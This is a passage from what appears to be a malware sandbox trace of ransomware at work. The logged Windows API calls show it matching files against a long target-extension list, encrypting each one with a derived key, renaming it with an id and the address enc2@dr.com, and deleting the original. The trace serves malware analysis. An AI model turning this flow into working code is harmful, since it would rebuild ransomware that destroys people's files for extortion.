d.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ots") returned=".ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.437] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.437] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.437] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.448] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x9787, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x9787, lpOverlapped=0x0) returned 1
	[0188.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.452] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb880) returned 1
	[0188.454] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.454] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.454] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.455] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.455] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.455] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb92b0) returned 1
	[0188.455] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.455] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x9787, dwBufLen=0x9787 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x9790) returned 1
	[0188.460] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.461] RtlMoveMemory (in: Destination=0xfe6910, Source=0xfdd180, Length=0x9787 | out: Destination=0xfe6910) 
	[0188.461] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.461] CryptEncrypt (in: hKey=0xfb92b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe6910*, pdwDataLen=0x18aefc*=0x9787, dwBufLen=0x9790 | out: pbData=0xfe6910*, pdwDataLen=0x18aefc*=0x9790) returned 1
	[0188.461] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.462] CryptDestroyKey (hKey=0xfb92b0) returned 1
	[0188.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.462] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0188.462] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.462] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0188.462] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.463] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.463] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.463] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.466] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 114
	[0188.466] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.466] WriteFile (in: hFile=0x388, lpBuffer=0xfe6910*, nNumberOfBytesToWrite=0x9790, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe6910*, lpNumberOfBytesWritten=0x18b358*=0x9790, lpOverlapped=0x0) returned 1
	[0188.470] CloseHandle (hObject=0x388) returned 1
	[0188.470] CloseHandle (hObject=0x2c0) returned 1
	[0188.470] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots")) returned 1
	[0188.483] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots")) returned 0
	[0188.484] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15076510, ftCreationTime.dwHighDateTime=0x1d971d1, ftLastAccessTime.dwLowDateTime=0x9974fc60, ftLastAccessTime.dwHighDateTime=0x1d972dd, ftLastWriteTime.dwLowDateTime=0x9974fc60, ftLastWriteTime.dwHighDateTime=0x1d972dd, nFileSizeHigh=0x0, nFileSizeLow=0xefac, dwReserved0=0x0, dwReserved1=0x0, cFileName="yxGmV9Tma2.ppt", cAlternateFileName="YXGMV9~1.PPT")) returned 1
	[0188.484] lstrcmpW (lpString1="yxGmV9Tma2.ppt", lpString2="..") returned 1
	[0188.484] lstrcmpW (lpString1="yxGmV9Tma2.ppt", lpString2=".") returned 1
	[0188.484] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.484] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="yxGmV9Tma2.ppt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\yxGmV9Tma2.ppt") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\yxGmV9Tma2.ppt"
	[0188.484] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\yxGmV9Tma2.ppt") returned 66
	[0188.485] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.485] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\yxGmV9Tma2.ppt", cchLength=0x42 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt") returned 0x42
	[0188.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.494] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.494] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt"
	[0188.494] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\yxgmv9tma2.ppt") returned 66
	[0188.495] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.495] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.495] StrStrW (lpFirst=".ppt", lpSrch=".") returned=".ppt"
	[0188.495] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.496] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.ot